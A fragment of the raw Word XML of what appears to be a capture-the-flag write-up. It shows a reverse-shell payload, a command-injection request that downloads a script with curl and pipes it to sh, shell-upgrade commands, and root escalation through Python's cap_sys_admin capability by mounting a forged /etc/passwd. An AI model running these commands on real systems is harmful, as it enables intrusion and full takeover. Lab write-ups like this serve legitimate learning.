    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
      <w:pPr>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39">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Now we will get a reverse shell on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.3ofh45580kg5" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload shell.sh:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">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#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">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/bin/bash -c 'bash -i &gt;&amp; /dev/tcp/ip-vpn/4444 0&gt;&amp;1'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We will start a Python server in the same directory containing our</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">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3378200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="53" name="image17.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image17.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3378200"/>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In Burp Suite, we will execute:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">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POST /_ul/vert16x?cmd=curl http://10.10.14.2/shell.sh|sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">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Do not forget to URL-encode the payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">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836507"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="72" name="image13.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image13.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:srcRect b="21009" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2836507"/>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Start Netcat to listen on a port to receive the reverse connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">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616200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="56" name="image22.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image22.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2616200"/>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After sending the payload, within a few seconds we receive the connection 😀</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">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552700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="64" name="image6.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image6.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2552700"/>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pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.d04v52tz5mc7" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell TTY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">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Upgrading a simple shell to a fully interactive TTY:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">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python -c "import pty;pty.spawn('/bin/bash')"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">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Ctrl+Z</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">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stty raw -echo;fg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">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Enter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">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export TERM=xterm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">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Going to the root directory </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we find our second flag 😀</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">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3848100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="63" name="image7.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image7.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3848100"/>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pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.itwd6qoikr2v" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ROOT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After running </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linpeas</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the machine, we notice that Python is configured with a capability called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cap_sys_admin. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using Python, we can mount a modified </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file over the real</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">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I will follow the steps from HackTricks:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId30">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities#cap_sys_admin</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">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3429000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="73" name="image23.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image23.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3429000"/>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794000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="59" name="image10.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image10.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2794000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">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Now we will add our hash.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">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4064000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="58" name="image12.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image12.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4064000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">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Now we modify the exploit from HackTricks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explanation from HackTricks:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CapEff</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: The capability set represents all capabilities the process is using at the moment (this is the actual set of capabilities that the kernel uses for permission checks). For file capabilities, the effective set is a single bit indicating whether the capabilities of the permitted set will be moved to the effective set upon running a binary.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId34">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities#cap_sys_admin</w:t>
        </w:r>
      </w:hyperlink>
